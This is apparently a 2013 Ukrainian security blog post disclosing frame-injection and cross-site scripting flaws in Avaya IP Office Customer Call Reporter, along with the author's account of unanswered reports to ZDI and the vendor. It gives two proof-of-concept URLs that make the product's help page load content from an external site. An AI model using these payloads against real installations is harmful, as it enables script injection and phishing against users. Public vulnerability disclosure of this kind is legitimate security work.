Уразливості в Avaya IP Office Customer Call Reporter

23:58 20.08.2013

У грудні, 06.12.2012, я знайшов Remote HTML Include та Remote XSS Include (Cross-Site Scripting) уразливості в Avaya IP Office Customer Call Reporter. Про що вже повідомив розробникам.

Спочатку я ще у грудні й січні повідомив ZDI про інші критичні уразливості в цьому продукті Avaya (про них я напишу пізніше, зараз наведу ці дірки). ZDI повільно відповідали і лише робили вигляд, що вони займаються цим питанням, лише у серпні активно взялися за справу, зв’язалися з Avaya, але ті не відповіли, тому ZDI відмовилися займатися цією справою. А у липні я повідомив розробникам (про ці дірки та інші критичні уразливості), але вони проігнорували моє повідомлення.

RHI (Frame Injection) (WASC-12):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua

RXI (Cross-Site Scripting) (WASC-08):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html

Вразливі Avaya IP Office Customer Call Reporter 8.0.9.13, 9.0.0.0 та попередні версії. Торік я перевірив у версії 8.0.9.13, а сьогодні в останній версії 9.0.0.0.


Leave a Reply

You must be logged in to post a comment.